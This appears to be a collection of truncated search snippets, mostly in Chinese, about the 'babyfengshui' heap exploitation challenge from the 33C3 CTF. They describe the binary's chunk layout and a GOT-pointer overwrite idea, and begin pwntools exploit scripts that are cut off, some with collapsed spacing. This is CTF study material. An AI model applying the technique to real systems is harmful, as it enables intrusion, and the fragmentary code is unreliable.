首先申请了description的chunk,接着又申请了一个0x80大小的chunk 然后将description的chunk指针 放到第二个chunk中, 接着是一个指针数组 *(&ptr+byte_804b069) 存放第二个chunk 接着是调用get_name函数输入name 读入124 字节到第二个chunk偏移为4的地方 get_name函数对输入的name进行查找,如果里面有10,则 将第...
同时,改指针为got表,我也能获得可写能力 那么简单竟然没想到,我服我自己了 exp: frompwnimport*fromLibcSearcherimport* local =0binary ="babyfengshui_33c3_2016"libc_path ='../libc-2.23.so'port ="27912"iflocal ==1: p = process(binary)else: p = remote("node3.buuoj.cn",port)defdbg():...
3.解决 exp: from pwn import * from LibcSearcher import * context.log_level='debug' p=remote('',25266) #p=process('./babyfengshui_33c3_2016') #p=process(["/root/glibc-all-in-one-master/libs/2.23-0ubuntu3_amd64/",'./easyheap'],env={"LD_PRELOAD":"/root/glibc-all-in-one-mast...
This was a pwnable worth 150 pts that I wrote for the33C3CTForganised byEat, Sleep, Pwn, Repeat Every script used for the deployment of the challenge are included, you can just execute make clean&&make all ./build_docker.sh&&./run_docker.sh ...